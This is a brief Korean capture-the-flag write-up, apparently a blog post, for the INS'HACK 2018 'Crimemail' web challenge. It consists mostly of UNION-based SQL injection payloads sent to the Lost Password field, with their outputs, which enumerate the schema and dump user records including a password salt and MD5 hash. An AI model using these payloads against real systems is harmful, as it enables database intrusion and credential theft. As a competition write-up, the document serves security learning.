카테고리 없음

INS'HACK CTF Write up

2018. 4. 8. 20:52

Crimemail (web)

Lost Password 부분에서 SQL Injection 취약점 발생함. 




username=aa' UNION ALL SELECT CONCAT(0x71706a7071,0x44635a76516b464e54626c766b6b56796843685a5650546c52427a6b6a69626a4c576b65776f5041,0x7171717071)#

username=aa' UNION ALL SELECT 1#
 -> 1

aa' UNION ALL SELECT @@version#
 -> 5.7.21-0ubuntu0.16.04.1

aa' union all select info from information_schema.processlist#
 -> SELECT hint FROM users WHERE username='aa' union all select info from information_schema.processlist#'

aa' union all select database()#
 -> db

aa' union all select concat(table_name,"\n") from information_schema.tables where table_schema=database()#
 -> users

aa' union all select column_name from information_schema.columns where table_name='users'#
 -> userID, username, pass_salt, pass_md5, hint

aa' union all select concat(userID, "|", username, "|", pass_salt, "|", pass_md5, "|", hint) as a from users#
 -> 5|c.hackle|yhbG|f2b31b3a7a7c41093321d0c98c37f5ad|I don't need any hints man!


md5 로 찾으면 댄다.